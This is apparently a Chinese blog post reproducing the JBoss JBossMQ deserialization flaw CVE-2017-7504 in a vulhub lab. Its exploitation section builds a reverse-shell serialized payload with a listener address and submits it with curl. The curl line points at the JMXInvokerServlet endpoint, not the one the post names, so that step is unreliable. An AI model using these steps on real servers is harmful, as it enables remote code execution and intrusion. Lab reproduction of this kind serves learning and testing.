CVE-2017-7504 JBoss 4.x JBossMQ JMS 反序列化漏洞
0X00-引言
love is over
请你不要再提起
过去就像如流云
他妈的总是要思考一些骚话,要不然不符合我这文艺的个性,wocao
0X01-环境搭建
靶机:CentOS Linux 7
攻击机:windows server 2016 && Kail
环境:vulhub
项目地址:https://github.com/vulhub/vulhub
搭建vulhub请访问:空白centos7 64 搭建vulhub(详细)
0X02-环境描述
JBoss AS 4.x及之前版本中,JbossMQ实现过程的JMS over HTTP Invocation Layer
的HTTPServerILServlet.java
文件存在反序列化漏洞,远程攻击者可借助特制的序列化数据利用该漏洞执行任意代码。
该漏洞出现在/jbossmq-httpil/HTTPServerILServlet
请求中,若访问200,则可能存在漏洞。
影响版本:JBoss AS 4.x及之前版本
0X03-漏洞复现
和CVE-2015-7501 JBoss JMXInvokerServlet 反序列化漏洞利用流程一样,只不过是接口换了而已
01-验证
http://192.168.234.128:8080/jbossmq-httpil/HTTPServerILServlet
可能存在漏洞
02-重定向到ReverseShellCommonsCollectionsHashMap.ser
文件
javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java
java -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap 192.168.234.135:888 #填写监听机IP和port
curl http://192.168.234.128:8080//invoker/JMXInvokerServlet --data-binary @ReverseShellCommonsCollectionsHashMap.ser #提交二进制数据
03-反弹shell
0X04-工具检测
工具下载:https://github.com/s0k/Deserialize
乱码不知什么原因
0X05-免责声明
仅供学习使用